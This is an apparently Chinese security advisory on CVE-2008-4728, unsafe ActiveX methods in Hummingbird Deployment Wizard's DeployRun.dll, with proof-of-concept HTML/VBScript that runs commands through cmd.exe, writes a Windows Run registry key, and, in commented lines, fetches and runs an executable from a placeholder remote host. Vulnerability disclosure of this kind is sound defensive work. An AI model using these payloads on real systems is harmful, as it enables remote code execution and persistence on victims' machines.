Hummingbird Deployment Wizard DeployRun.dll多个不安全调用漏洞
发布日期:2008-10-17
更新日期:2008-10-21
受影响系统:Hummingbird Deployment Wizard 2008
描述:
BUGTRAQ ID:
31799
CVE(CAN) ID:
CVE-2008-4728
Hummingbird Deployment Wizard允许用户基于web安装任何Hummingbird产品并自动连接到主机。
Hummingbird Deployment Wizard的DeployRun.DeploymentSetup.1(DeployRun.dll)ActiveX控件没有正确地验证对Run()、SetRegistryValueAsString()和PerformUpdateAsync()方式所传送的输出参数,如果用户受骗访问了恶意网页的话,就可能执行任意命令或以当前登录用户的权限修改已有的注册表项。
<*来源:shinnai (
shinnai@autistici.org)
链接:
http://secunia.com/advisories/32337/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.Run "cmd.exe", "/C calc.exe"
'test.Run "
http://www.SomeSite.com/SomeFile.exe", ""
End Sub
</script>
<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
'test.SetRegistryValueAsString "Existing Registry Path + Existing Registry Key", "Value to change"
test.SetRegistryValueAsString "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YourFavouriteKey", "Hello World!"
End Sub
</script>
<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test' height='20' width='20'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.PerformUpdateAsync "calc.exe"
'test.PerformUpdateAsync "
http://www.SomeSite.com/SomeFile.exe"
End Sub
</script>
建议:
厂商补丁:
Hummingbird
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.hummingbird.com/浏览次数:2685
严重程度:0(网友投票)
